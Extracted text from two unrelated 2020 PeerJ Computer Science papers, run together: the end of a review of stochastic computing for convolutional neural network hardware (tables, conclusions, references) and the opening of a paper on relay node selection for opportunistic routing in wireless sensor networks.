36.4 3.53 W 98.26 221,287 ASIC 2018 SC 128bit (Li et al., 2018a) 22.9 2.6 W 99.07 1,231,971 Lenet-5 ASIC 2018 SC DWM 128bit (Ma et al., 2018) 19.8 0.028W 98.94 – CPU 2009 Software 263 156 W – 0.9 GPU 2011 Software 520 202.5 W – 2.8 AlexNet (last second layer) ASIC 2018 SC 128bit (Li et al., 2018a) 24.7 1.9 W – 1,326,400 ASIC 2015 Binary 5.429 3.287mW – – ASIC 2017 SC MAC 1.408 1.369mW – –Custom (3x3filter) ASIC 2019 SC DMAC 1.439 1.393mW – – ASIC 2017 Binary – 380 nJ 97.7 –Custom (Ardakani et al., 2017) ASIC 2017 Integral SC – 299 nJ 97.73 – ASIC 2015 Binary 0.98 0.236W – 1158.11 GOPS/W ConvNet for MNIST ASIC 2017 SC MAC 0.43 0.279W – 5640.23 GOPS/W ASIC 2019 BNN 1.95 220 nJ 91 –Custom (Hirtzlin et al., 2019) ASIC 2019 SC BNN 0.73 90 nJ 89.6 – Notes. GOPS, Giga operations per second. (Zhu, Dong & Su, 2019). Thus, the area and power savings of SC BNN could be extreme, challenging the performance of SC CNN. Although no standard reference exists for a fair comparison, we can compare the performance difference of SC CNN/BNN in CNN model-wise as shown in Table 1 to highlight the clear advantage of SC in CNN application. Nevertheless, the year of comparable studies varies greatly, and hardware and software efficiencies had greatly improved over the last decade, thus should only be taken as a rough comparison. In Lee and Abdul Halim (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.309 28/35 https://peerj.com https://doi.org/10.7717/peerjcs.309/fig-19 http://dx.doi.org/10.7717/peerj-cs.309 Table 2 Component-wise performance comparison of SC CNN. SC CNN/BNN components Author Platform/ software Relative accuracy (%) Area/gate count (%) Power/Energy saving (%) Relative to Integra SC Ardakani et al. (2017) FPGA & ASIC +0.03 −33.9 21.3 Binary computing ESL Canals et al. (2016) FPGA −2.23 – – Binary computing APC + Btanh Kim, Lee & Choi (2016a), Kim, Lee & Choi (2016b) and Kim et al. (2016) Synopsys Design Compiler −0.18; −1.71 (EDT) −50.0 70.0; 76.2 (EDT) Binary computing APC with inverse adder Li et al. (2018a) Synopsys Design Compiler – −50.0 10.0 Normal APC SC MaxPooling Ren et al. (2017) Synopsys Design Compiler −0.20 −92.7 98.3 GPU computing SC ReLU activation Li et al. (2018a) Synopsys Design Compiler −0.88 −95.3 99.1 GPU computing SC normalisation Li et al. (2017b) Synopsys Design Compiler −0.02 −83.8 88.9 Binary computing SC MAC Sim & Lee (2017) Synopsys Design Compiler −1 −93.9 −89.4 Binary computing ASICa 292 AlexNet 147 InceptionV3 370 VGG16 SC DMAC Hojabr et al. (2019) Synopsys Design Compiler – −73.5 12 MobileNet SC Sigmoid activation Li et al. (2017a) FreePDK −0.01 −96.8 96.7 Binary computing −0.79 −98.6 99.1 Binary computing – −45.7 77.9 Unipolar SC SC Quantization Li et al. (2018b) FreePDK – −60.3 85.8 Bipolar SC SC BNN Hirtzlin et al. (2019) Cadence First En- counter −1.40 −62.0 240 Binary BNN Notes. aBinary computing ASIC apply to the CNN model comparison. the case of component-wise performance comparison, Table 2 could further clarify the performance number that had been mentioned in the previous section if any. CONCLUSIONS The SC may still not well developed relatively speaking. Still, with the trending of highly parallelised computing use case, SC might be the good old yet not-so-old idea, specifically when people are still actively researching and optimising SC circuits with the driving momentum of CNN algorithm. That being said, the FPGA itself is still not widely adopted Lee and Abdul Halim (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.309 29/35 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.309 in the programming community, let alone the SC adaptation. Numerous efforts were made in the high-level CNN to FPGA translation for binary domain computation (Liu et al., 2017; Noronha, Salehpour & Wilton, 2019). However, the bridging effort of SC in FPGA is near to non-existence or should be said most of the SC studies lean to ASIC. Many people are interested in offloading computationally intensive workloads such as image processing and CNN inferencing to the co-processor. Thus, SC elements should be made an open-source IPs and introduced into the FPGA design ecosystem so that people can innovate on it. The open-sourcing design could help accelerate the SC development because researchers do not have to redesign the IP from scratch which is the major hurdle for novel development and could turn down people from being interested in SC technology. It could be the primary reason why SC CNN lacks attention, leading to a low number of comparable data as well as benchmarking. Speaking of parallelism capability in SC, data bandwidth bottlenecking could be a major challenge. Even though SC can have vast arrays of WBG or comparator to compare a massive amount of binary values at once, delivering massive data on time is challenging. Notably, SC does require hundreds if not thousands of clock cycles to complete. Thus, data transfer could be pipelined and buffered asynchronously. Moreover, a tremendous amount of data needs to be ready beside the SC elements. As such, local memory element such as SRAM (in ASIC terms) or BRAM/Flip-flop (in FPGA term) limitation should be the concern. In any case, memory-centric computing design should be the direction of SC development, especially in SC CNN, where hundreds of thousands, even millions of operations could be parallelised. There are still a lot of optimisation rooms for SC implementation on FPGA since most of the modern FPGA consists of 6-input lookup tables. ASIC logic might not be able to translate into the FPGA fabric efficiently because lookup tables are hardwired. Although FPGA is flexible in terms of hardware implementation, it is not as customisable as the ASIC. Modern FPGA also consists of other resources capable of performance computing such as digital signal processors or arithmetic logic awaiting to be utilised. However, those aspects could only be discovered in future research efforts. Nomenclature ADC Analog-to-digital converter ALU arithmetic logic unit APC approximate parallel counter ASC Analog-to-stochastic converter ASIC application-specific integrated circuit BNN binarised neural network Btanh binary input Stanh CNN convolutional neural network CPU central processing unit DNN deep neural network DWM domain-wall memory EDT early decision termination Lee and Abdul Halim (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.309 30/35 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.309 FA full adder FPGA field-programmable gate array FPU floating-point unit FSM finite state machine GPU graphic processing unit IoT internet of things LFSR linear feedback shift register MAC multiplier-accumulator ReLU rectified linear unit RNG random number generator SC stochastic computing SNG stochastic number generator SUC shifted unary code Stanh stochastic TanH TanH hyperbolic tangent WBG weighted binary generator ADDITIONAL INFORMATION AND DECLARATIONS Funding This research was funded by the School of Electrical and Electronic Engineering, Universiti Sains Malaysia (1001/PELECT/8014152). The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: School of Electrical and Electronic Engineering, Universiti Sains Malaysia: 1001/P- ELECT/8014152. Competing Interests The authors declare there are no competing interests. Author Contributions • Yang Yang Lee conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • Zaini Abdul Halim analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: No raw data is available for literature review. Lee and Abdul Halim (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.309 31/35 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.309 REFERENCES Alaghi A, Hayes JP. 2013. Survey of stochastic computing. Transactions on Embedded Computing Systems 12:92 DOI 10.1145/2465787.2465794. Alaghi A, Qian W, Hayes JP. 2018. The promise and challenge of stochastic computing. IEEE Transactions on Computer-Aided Design of Integrated Circuits and Systems 37:1515–1531 DOI 10.1109/TCAD.2017.2778107. Angizi S, Fan D. 2017. IMC: energy-efficient in-memory convolver for accelerating binarized deep neural network. In: ACM International Conference Proceeding Series 2017-July. DOI 10.1145/3183584.3183613. Ardakani A, Leduc-Primeau F, Onizawa N, Hanyu T, Gross WJ. 2017. VLSI im- plementation of deep neural network using integral stochastic computing. IEEE Transactions on Very Large Scale Integration (VLSI) Systems 25:2688–2699 DOI 10.1109/TVLSI.2017.2654298. Brown BD, Card HC. 2001. Stochastic neural computation I: computational elements. IEEE Transactions on Computers 50:891–905 DOI 10.1109/12.954505. Canals V, Morro A, Oliver A, Alomar ML, Rosselló JL. 2016. A new stochas- tic computing methodology for efficient neural network implementation. IEEE Transactions on Neural Networks and Learning Systems 27:551–564 DOI 10.1109/TNNLS.2015.2413754. Capra M, Bussolino B, Marchisio A, Shafique M, Masera G, Martina M. 2020. An up- dated survey of efficient hardware architectures for accelerating deep convolutional neural networks. Future Internet 12:113 DOI 10.3390/fi12070113. Chen TH, Hayes JP. 2016. Design of division circuits for stochastic computing. In: Proceedings of IEEE Computer Society Annual Symposium on VLSI, ISVLSI 2016- September. Piscataway: IEEE, 116–121 DOI 10.1109/ISVLSI.2016.48. Chen TH, Ting P, Hayes JP. 2018. Achieving progressive precision in stochastic comput- ing. In: 2017 IEEE Global Conference on Signal and Information Processing, GlobalSIP 2017. Piscataway: IEEE, 1320–1324 DOI 10.1109/GlobalSIP.2017.8309175. Chu SI. 2020. New divider design for stochastic computing. IEEE Transactions on Circuits and Systems II: Express Briefs 67:147–151 DOI 10.1109/TCSII.2019.2906385. De Aguiar JM, Khatri SP. 2015. Exploring the viability of stochastic computing. In: Proceedings of the 33rd IEEE International Conference on Computer Design, ICCD 2015. Piscataway: IEEE, 391–394 DOI 10.1109/ICCD.2015.7357131. Fei-Fei L, Deng J, Li K. 2010. ImageNet: a large-scale hierachical image database. Journal of Vision 9:1037–1037 DOI 10.1167/9.8.1037. Galloway A, Taylor GW, Moussa M. 2018. Attacking binarized neural networks. In: 6th International conference on learning representations, ICLR 2018—conference track proceedings. 1–14. Hinton GE, Srivastava N, Krizhevsky A, Sutskever I, Salakhutdinov RR. 2012. Improv- ing neural networks by preventing co-adaptation of feature detectors. 1–18ArXiv preprint. arXiv:1207.0580. Lee and Abdul Halim (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.309 32/35 https://peerj.com http://dx.doi.org/10.1145/2465787.2465794 http://dx.doi.org/10.1109/TCAD.2017.2778107 http://dx.doi.org/10.1145/3183584.3183613 http://dx.doi.org/10.1109/TVLSI.2017.2654298 http://dx.doi.org/10.1109/12.954505 http://dx.doi.org/10.1109/TNNLS.2015.2413754 http://dx.doi.org/10.3390/fi12070113 http://dx.doi.org/10.1109/ISVLSI.2016.48 http://dx.doi.org/10.1109/GlobalSIP.2017.8309175 http://dx.doi.org/10.1109/TCSII.2019.2906385 http://dx.doi.org/10.1109/ICCD.2015.7357131 http://dx.doi.org/10.1167/9.8.1037 http://arXiv.org/abs/1207.0580 http://dx.doi.org/10.7717/peerj-cs.309 Hirtzlin T, Penkovsky B, Bocquet M, Klein JO, Portal JM, Querlioz D. 2019. Stochastic computing for hardware implementation of binarized neural networks. IEEE Access 7:76394–76403 DOI 10.1109/ACCESS.2019.2921104. Hojabr R, Givaki K, Tayaranian SMR, Esfahanian P, Khonsari A, Rahmati D, Najafi MH. 2019. SkippyNN: an embedded stochastic-computing accelerator for convo- lutional neural networks. In: Proceedings—design automation conference. New York: ACM, 1–6 DOI 10.1145/3316781.3317911. Ichihara H, Ishii S, Sunamori D, Iwagaki T, Inoue T. 2014. Compact and accurate stochastic circuits with shared random number sources. In: 2014 32nd IEEE Inter- national Conference on Computer Design, ICCD 2014. Piscataway: IEEE, 361–366 DOI 10.1109/ICCD.2014.6974706. Ioffe S, Szegedy C. 2015. Batch normalization: accelerating deep network training by reducing internal covariate shift. Proceedings of the 32nd International Conference on Machine Learning 37:730–743 DOI 10.1080/17512786.2015.1058180. Jayakumar H, Raha A, Kim Y, Sutar S, Lee WS, Raghunathan V. 2016. Energy-efficient system design for IoT devices. In: Proceedings of the Asia and South Pacific Design Automation Conference, ASP-DAC 25-28-January. Piscataway: IEEE, 298–301 DOI 10.1109/ASPDAC.2016.7428027. Joe H, Kim Y. 2019. Novel stochastic computing for energy-efficient image processors. Electronics 8:1–11 DOI 10.3390/electronics8060720. Kim K, Kim J, Yu J, Seo J, Lee J, Choi K. 2016. Dynamic energy-accuracy trade-off using stochastic computing in deep neural networks. In: Proceedings—design automation conference 05-09-June. DOI 10.1145/2897937.2898011. Kim K, Lee J, Choi K. 2016a. An energy-efficient random number generator for stochastic circuits. In: Proceedings of the Asia and South Pacific Design Au- tomation Conference, ASP-DAC 25-28-January. New York: ACM, 256–261 DOI 10.1109/ASPDAC.2016.7428020. Kim K, Lee J, Choi K. 2016b. Approximate de-randomizer for stochastic circuits. In: ISOCC 2015—international SoC design conference: SoC for internet of everything (IoE). 123–124 DOI 10.1109/ISOCC.2015.7401667. Li Z, Li J, Ren A, Cai R, Ding C, Qian X, Draper J, Yuan B, Tang J, Qiu Q, Wang Y. 2018a. HEIF: highly efficient stochastic computing-based inference framework for deep neural networks. IEEE Transactions on Computer-Aided Design of Integrated Circuits and Systems 38:1543–1556 DOI 10.1109/TCAD.2018.2852752. Li B, Najafi MH, Yuan B, Lilja DJ. 2018b. Quantized neural networks with new stochas- tic multipliers. In: Proceedings—international symposium on quality electronic design, ISQED 2018-March. 376–382 DOI 10.1109/ISQED.2018.8357316. Li B, Qin Y, Yuan B, Lilja DJ. 2017a. Neural network classifiers using stochastic com- puting with a hardware-oriented approximate activation function. In: Proceedings— 35th IEEE international conference on computer design, ICCD 2017. Piscataway: IEEE, 97–104 DOI 10.1109/ICCD.2017.23. Li J, Yuan Z, Li Z, Ding C, Ren A, Qiu Q, Draper J, Wang Y. 2017b. Hardware-driven nonlinear activation for stochastic computing based deep convolutional neural Lee and Abdul Halim (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.309 33/35 https://peerj.com http://dx.doi.org/10.1109/ACCESS.2019.2921104 http://dx.doi.org/10.1145/3316781.3317911 http://dx.doi.org/10.1109/ICCD.2014.6974706 http://dx.doi.org/10.1080/17512786.2015.1058180 http://dx.doi.org/10.1109/ASPDAC.2016.7428027 http://dx.doi.org/10.3390/electronics8060720 http://dx.doi.org/10.1145/2897937.2898011 http://dx.doi.org/10.1109/ASPDAC.2016.7428020 http://dx.doi.org/10.1109/ISOCC.2015.7401667 http://dx.doi.org/10.1109/TCAD.2018.2852752 http://dx.doi.org/10.1109/ISQED.2018.8357316 http://dx.doi.org/10.1109/ICCD.2017.23 http://dx.doi.org/10.7717/peerj-cs.309 networks. In: Proceedings of the international joint conference on neural networks 2017- May. New York: ACM, 1230–1236 DOI 10.1109/IJCNN.2017.7965993. Li J, Yuan Z, Li Z, Ren A, Ding C, Draper J, Nazarian S, Qiu Q, Yuan B, Wang Y. 2017c. Normalization and dropout for stochastic computing-based deep convolutional neural networks. Integration 65:395–403 DOI 10.1016/j.vlsi.2017.11.002. Liew SS, Khalil-Hani M, Ahmad Radzi S, Bakhteri R. 2016. Gender classification: a convolutional neural network approach. Turkish Journal of Electrical Engineering and Computer Sciences 24:1248–1264 DOI 10.3906/elk-1311-58. Liu Z, Dou Y, Jiang J, Xu J. 2017. Automatic code generation of convolutional neu- ral networks in fpga implementation. In: Proceedings of the 2016 international conference on field-programmable technology, FPT 2016. Piscataway: IEEE, 61–68 DOI 10.1109/FPT.2016.7929190. Ma X, Zhang Y, Yuan G, Ren A, Li Z, Han J, Hu J, Wang Y. 2018. An area and en- ergy efficient design of domain-wall memory-based deep convolutional neural networks using stochastic computing. In: Proceedings—international symposium on quality electronic design, ISQED 2018-March. Piscataway: IEEE, 314–321 DOI 10.1109/ISQED.2018.8357306. Mittal S. 2020. A survey of FPGA-based accelerators for convolutional neural networks. Neural Computing and Applications 32:1109–1139 DOI 10.1007/s00521-018-3761-1. Najafi MH, Li P, Lilja DJ, Qian W, Bazargan K, Riedel M. 2017. A reconfigurable architecture with sequential logic-based stochastic computing. ACM Journal on Emerging Technologies in Computing Systems 13:57 DOI 10.1145/3060537. Naveen S, Kounte MR. 2019. Key technologies and challenges in IoT edge computing. In: 2019 Third international conference on I-SMAC (IoT in social, mobile, analytics and cloud) (I-SMAC). Piscataway: IEEE, 61–65 DOI 10.1109/I-SMAC47947.2019.9032541. Noronha DH, Salehpour B, Wilton SJE. 2019. Leflow: enabling flexible fpga high-level synthesis of tensorflow deep neural networks. In: 5th international workshop on FPGAs for software programmers, FSP 2018, co-located with international conference on field programmable logic and applications, FPL 2018. 46–53. Nurvitadhi E, Sheffield D, Sim J, Mishra A, Venkatesh G, Marr D. 2017. Accelerating binarized neural networks: comparison of FPGA, CPU, GPU, and ASIC. In: Proceedings of the 2016 International Conference on Field-Programmable Technology, FPT 2016. Piscataway: IEEE, 77–84 DOI 10.1109/FPT.2016.7929192. Ren A, Li Z, Ding C, Qiu Q, Wang Y, Li J, Qian X, Yuan B. 2017. SC-DCNN: highly-scalable deep convolutional neural network using stochastic comput- ing. In: International conference on architectural support for programming lan- guages and operating systems—ASPLOS Part F1271. New York: ACM, 405–418 DOI 10.1145/3037697.3037746. Ren A, Li Z, Wang Y, Qiu Q, Yuan B. 2016. Designing reconfigurable large-scale deep learning systems using stochastic computing. In: 2016 IEEE international conference on rebooting computing, ICRC 2016—conference proceedings. Piscataway: IEEE, DOI 10.1109/ICRC.2016.7738685. Lee and Abdul Halim (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.309 34/35 https://peerj.com http://dx.doi.org/10.1109/IJCNN.2017.7965993 http://dx.doi.org/10.1016/j.vlsi.2017.11.002 http://dx.doi.org/10.3906/elk-1311-58 http://dx.doi.org/10.1109/FPT.2016.7929190 http://dx.doi.org/10.1109/ISQED.2018.8357306 http://dx.doi.org/10.1007/s00521-018-3761-1 http://dx.doi.org/10.1145/3060537 http://dx.doi.org/10.1109/I-SMAC47947.2019.9032541 http://dx.doi.org/10.1109/FPT.2016.7929192 http://dx.doi.org/10.1145/3037697.3037746 http://dx.doi.org/10.1109/ICRC.2016.7738685 http://dx.doi.org/10.7717/peerj-cs.309 Salehi SA. 2020. Low-cost stochastic number generators for stochastic computing. IEEE Transactions on Very Large Scale Integration (VLSI) Systems 28:992–1001 DOI 10.1109/TVLSI.2019.2963678. Sim H, Lee J. 2017. A new stochastic computing multiplier with application to deep convolutional neural networks. In: Proceedings—design automation conference part 12828. New York: ACM, 1–6 DOI 10.1145/3061639.3062290. Sim H, Nguyen D, Lee J, Choi K. 2017. Scalable stochastic-computing accelera- tor for convolutional neural networks. In: Proceedings of the Asia and South Pacific design automation conference, ASP-DAC. Piscataway: IEEE, 696–701 DOI 10.1109/ASPDAC.2017.7858405. Simons T, Lee DJ. 2019. A review of binarized neural networks. Electronics 8:661 DOI 10.3390/electronics8060661. Xie Y, Liao S, Yuan B, Wang Y, Wang Z. 2017. Fully-parallel area-efficient deep neural network design using stochastic computing. 64. Piscataway: IEEE, 1382–1386 DOI 10.1109/TCSII.2017.2746749. Yang M, Li B, Lilja DJ, Yuan B, Qian W. 2018. Towards theoretical cost limit of stochas- tic number generators for stochastic computing. In: Proceedings of IEEE computer society annual symposium on VLSI, ISVLSI 2018-July. Piscataway: IEEE, 154–159 DOI 10.1109/ISVLSI.2018.00037. Yu J, Kim K, Lee J, Choi K. 2017. Accurate and efficient stochastic computing hard- ware for convolutional neural networks. In: Proceedings - 35th IEEE interna- tional conference on computer design, ICCD 2017. Piscataway: IEEE, 105–112 DOI 10.1109/ICCD.2017.24. Zhakatayev A, Lee S, Sim H, Lee J. 2018. Sign-magnitude sc: getting 10x accuracy for free in stochastic computing for deep neural networks. In: Proceedings—design automa- tion conference part F1377. New York: ACM, 1–6 DOI 10.1145/3195970.3196113. Zhang Y, Zhang X, Song J, Wang Y, Huang R, Wang R. 2019. Parallel Convolutional Neural Network (CNN) accelerators based on stochastic computing. In: IEEE workshop on signal processing systems, SiPS: design and implementation. Piscataway: IEEE, 19–24 DOI 10.1109/SiPS47522.2019.9020615. Zhu S, Dong X, Su H. 2019. Binary ensemble neural network: more bits per network or more networks per bit? In: Proceedings of the IEEE computer society conference on computer vision and pattern recognition 2019-June. Piscataway: IEEE, 4918–4927 DOI 10.1109/CVPR.2019.00506. Lee and Abdul Halim (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.309 35/35 https://peerj.com http://dx.doi.org/10.1109/TVLSI.2019.2963678 http://dx.doi.org/10.1145/3061639.3062290 http://dx.doi.org/10.1109/ASPDAC.2017.7858405 http://dx.doi.org/10.3390/electronics8060661 http://dx.doi.org/10.1109/TCSII.2017.2746749 http://dx.doi.org/10.1109/ISVLSI.2018.00037 http://dx.doi.org/10.1109/ICCD.2017.24 http://dx.doi.org/10.1145/3195970.3196113 http://dx.doi.org/10.1109/SiPS47522.2019.9020615 http://dx.doi.org/10.1109/CVPR.2019.00506 http://dx.doi.org/10.7717/peerj-cs.309 work_lyz5e77pqfgn5owqleohcuxruq ---- Submitted 8 August 2020 Accepted 10 November 2020 Published 7 December 2020 Corresponding authors Por Lip Yee, porlip@um.edu.my Ihsan Ali, ihsanalichd@siswa.um.edu.my Academic editor Rajanikanth Aluvalu Additional Information and Declarations can be found on page 22 DOI 10.7717/peerj-cs.326 Copyright 2020 Yee et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Improving the performance of opportunistic routing using min-max range and optimum energy level for relay node selection in wireless sensor networks Por Lip Yee1,*, Shahid Mehmood1,*, Ahmad Almogren2, Ihsan Ali1 and Mohammad Hossein Anisi3 1 Department of Computer System and Technology, Faculty of Computer Science and Information Technology, University of Malaya, Kuala Lumpur, Malaysia 2 Department of Computer Science, College of Computer and Information Sciences, King Saud University, Riyadh, Saudi Arabia 3 School of Computer Science and Electronic Engineering, University of Essex, Colchester, United Kingdom * These authors contributed equally to this work. ABSTRACT Opportunistic routing is an emerging routing technology that was proposed to overcome the drawback of unreliable transmission, especially in Wireless Sensor Networks (WSNs). Over the years, many forwarder methods were proposed to improve the performance in opportunistic routing. However, based on existing works, the findings have shown that there is still room for improvement in this domain, especially in the aspects of latency, network lifetime, and packet delivery ratio. In this work, a new relay node selection method was proposed. The proposed method used the minimum or maximum range and optimum energy level to select the best relay node to forward packets to improve the performance in opportunistic routing. OMNeT++ and MiXiM framework were used to simulate and evaluate the proposed method. The simulation settings were adopted based on the benchmark scheme. The evaluation results showed that our proposed method outperforms in the aspect of latency, network lifetime, and packet delivery ratio as compared to the benchmark scheme. Subjects Adaptive and Self-Organizing Systems, Agents and Multi-Agent Systems, Algorithms and Analysis of Algorithms, Artificial Intelligence, Computer Networks and Communications Keywords Opportunistic routing, Optimum energy, Threshold energy level, Relay node, Wireless sensor networks (WSNs) INTRODUCTION Opportunistic Routing (OR) is a routing scheme that takes advantage of the broadcasting nature of the wireless medium to improve the link reliability, efficiency, and the network throughput in multi-hop routing (Chakchouk, 2015; Eu, Tan & Seah, 2010; Jadhav & Satao, 2016). According to Biswas & Morris (2005), Boukerche & Darehshoorzadeh (2014), Chachulski et al. (2007), Choudhury & Vaidya (2004) and Larsson (2001), OR improves network How to cite this article Yee PL, Mehmood S, Almogren A, Ali I, Anisi MH. 2020. Improving the performance of opportunistic routing using min-max range and optimum energy level for relay node selection in wireless sensor networks. PeerJ Comput. Sci. 6:e326 http://doi.org/10.7717/peerj-cs.326 https://peerj.com/computer-science mailto:porlip@um.edu.my mailto:\unskip \penalty -\@M ihsanalichd@siswa.um.edu.my mailto:\unskip \penalty -\@M ihsanalichd@siswa.um.edu.my https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.326 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.326 performance in the context of multi-hop and mesh networks, such as relay node selection in opportunistic networks. A multi-hop network is a network of relay nodes that are connected through the communication links. Due to the limited transmission range, the relay nodes in the network may not be able to communicate directly with the destination node. Hence, they need other relay nodes that can forward packets to the destination node (Zhao, Mosler & Braun, 2012). In OR, the forwarder method selects the forwarder node that is nearer to the destination node to forward the packets (Jadhav & Satao, 2016). For the source node to forward the packets to the destination node, the OR forwarder method selects a next-hop which is determined by using a routing metric such as energy, geographical distance, hop count, expected transmission count (ETX), and expected transmission time (ETT). These routing metrics could be used to forward the packets (Menon, 2019). The source node constructs a list of forwarder nodes to transmit the packets to the destination node. This list is developed based on priority, and each relay node is selected based on the metrics per the OR forwarder method requirements (Biswas & Morris, 2005). There are several advantages of using OR. Compared to legacy routing, OR avoids duplicate packet transmission, and it also reduces the amount of packet retransmission significantly due to link failures. OR can exploit the reception of a similar packet at multiple available relay nodes in order to improve the network performance especially in multi-hop and mesh wireless networks (Biswas & Morris, 2005; Chachulski et al., 2007; Choudhury & Vaidya, 2004; Larsson, 2001). In multi-hop wireless networks, packets are forwarded via at least one intermediate relay node from the source node to the destination node (Coutinho & Boukerche, 2017). A mesh wireless network is referred as a network topology in which the infrastructure of the nodes is connected directly, dynamically, and non-hierarchically to the other nodes (Darehshoorzadeh, Robson & Boukerche, 2015; Li et al., 2019). Therefore, proposing an effective forwarder method to forward packets from one relay node to another in such networks is important because it will affect the performance of the networks (Jain, Dongariya & Verma, 2017). Throughout the years, many forwarder methods have been proposed to improve the performance of OR. In general, most of the forwarder methods use routing metrics such as energy, geographical distance, hop count, ETX, and ETT to forward packets (Menon, 2019). However, these methods have several drawbacks, especially in the aspects of latency, first dead node, network lifetime, and receiving packets ratio. Several relay node selection methods as a means to improve the performance of routing in the opportunistic network. This study expands on the above recommendation by conducting a study that aims to improve the performance of routing in the opportunistic network. In this research work, a relay node selection method that uses maximum and minimum range (min-max range) and optimum energy level to select the best forwarder node to improve the performance in OR is proposed. The simulation results showed that the proposed method could reduce the lowest latency, produced the highest time for the first dead node, improved the network lifetime, and produced a higher receiving packet ratio compared to the related works (AOR, ENO_OR, ENS_OR, EXOR, GeRaF, and EEOR). Yee et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.326 2/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.326 RELATED WORKS In 2003, Zorzi & Rao (2003) proposed a forwarder method named Geographic Random Forwarding (GeRaF). This method is based on the geographical location of the nodes involved. Initially, the active relay nodes, which are located nearer to the destination node, will send a ‘‘clear to send’’ message to the source node. The source node then will discover the relay nodes that can participate in the packet forwarding process around its coverage area. During the discovery, the source node will receive an acknowledgement from each of the relay nodes that can participate in packet forwarding. The source node will randomly select one of the relay nodes as the forwarder node to forward the packet. The forwarder node will use the same mechanism to randomly select another forwarder node until the packet reaches the destination node. According to the authors, this method can reduce latency because it randomly selects a relay node that can forward a packet without further delay. However, the scheduling algorithm used in this method might produce a low network lifetime because it does not consider the energy level of the relay node when determining the forwarder node. Energy is an important aspect because if a relay node has a low energy level, it might die quickly, or it might drop the received packet due to insufficient energy. Biswas & Morris (2005) proposed a forwarder method named Opportunistic Multi-hop Routing (ExOR) in 2005. According to the author, ExOR is one of the initial primary protocols, which practically implemented opportunistic routing in WSNs. In this method, packets deliver to the same destination are grouped in a batch by the source node. Each batch has a unique ID. In order to deliver the packets, the source node needs to determine a forwarder node based on distance and the ETX. Higher priority is given to the node, which has a shorter distance and lesser ETX. The source node will construct a list of forwarder nodes based on priority. The forwarder nodes will use the list to transmit packets via end-to-end transmission. The list is maintained by each of the forwarder nodes that participated in the packet transmission. According to the authors, this method can increase the throughput of large unicast transmissions in multi-hop wireless sensor networks. However, this method produced high overhead, especially during the coordination of all the relay nodes in the network. Mao et al. (2011) proposed a forwarder method named Energy-Efficient Opportunistic Routing (EEOR). The authors introduced a method to select a forwarder node by calculating the cost and energy using Eq. (1). Cu(FWD ∗)=Chu(FWD ∗)+Cfu(FWD ∗)+CCu (FWD ∗) (1) Cu(FWD∗) is denoted as the expected cost of a source node to broadcast a packet to the destination node. Chu(FWD ∗) is the cost for determining the relay node. Cfu(FWD∗) is the cost for determining the forwarder node. CCu (FWD ∗) is the communication cost for the forwarder node to transmit packets. The cost of CCu (FWD ∗) is incurred when the network is at the ‘‘static’’ mode. In ‘‘active’’ mode, the cost of forwarding the packets is calculated based on the traffic flows. After calculating the Cu(FWD∗), this method will select the related relay nodes that have the minimum costing to forward the packets from the source node to the destination node. According to the authors, this method can minimize Yee et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.326 3/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.326 energy consumption and improve network lifetime. However, this method uses unicast and single-path to transmit packets. Moreover, it required the nodes that take part in the transmission to be in an ‘‘active’’ mode always. As a result, this method might produce high first dead node for the networks. Lee & Haas (2011) proposed a forwarder method named Short-haul Multi-hop (Short- Haul). This method uses the shortest route between the source node and the destination node to select forwarder nodes. In this method, a source node will firstly broadcast a message to all the relay nodes. The relay node that has the closest distance to the destination node will be selected as the forwarder node to transmit packets. The selected forwarder node will send an acknowledgement to the source node once the packets have successfully received. After that, the forwarded node will broadcast a message to all the relay nodes, and then it will forward the packets to the relay node that has the closest distance to the destination node. The process of searching the closest relay nodes will be repeated until the packets have been delivered to the destination node. This method uses multi-path routing to forward the packets to the destination node. During the transmission, the sender node will retransmit the packets if it does not receive an acknowledgement from the forwarder node. However, the forwarder nodes and the destination node will discard any duplicate packets sent by the sender node. Once the destination node has received the packets, it will send an acknowledgement to all the forwarder nodes in the path. According to the author, this method is simple and can be easily integrated with other opportunistic routing algorithms. Moreover, this method can reduce the packet’s duplication problem and increase the throughput of the transmission. However, this method might consume more energy. It might produce low network lifetime because the sender nodes are required to broadcast a message to all the relay nodes for determining which relay node has the closest distance to the destination node. In 2015, Luo et al. (2015) proposed a forwarder method named Energy Savings Via Opportunistic Routing (ENS_OR). This method uses a single-path to transmit packets. To select the forwarder node, it uses distance and energy level as in Eq. (2). P(h+i)=  (dh+i−dh) [ 1∣∣dh+i−dop∣∣+Eh+i−ζ ] (h+i)∈F(h),−R≤ i≤R (2) P(h) is denoted as the current forwarder node. i is denoted as an integer starting from 1. (d h+i − d h) is denoted as the distance between P(h) and P(h + i). E h+i signifies the remaining energy of P (h + i). ζ signifies the value of the threshold energy. F(h) is denoted as the selected forwarder list of P(h). R signifies the maximum transmission range. The source node will construct a list based on the acceptable distance and energy level. This list will become the priority list when selecting a relay node to forward packets. Once the path has determined, the packets will be sent via end-to-end transmission. According to the authors, this method can reduce energy consumption and increase the network lifetime. However, this method might decrease the network performance when the single-path is congested, or the relay node has insufficient energy to forward packets through the end-to-end transmission. Yee et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.326 4/25 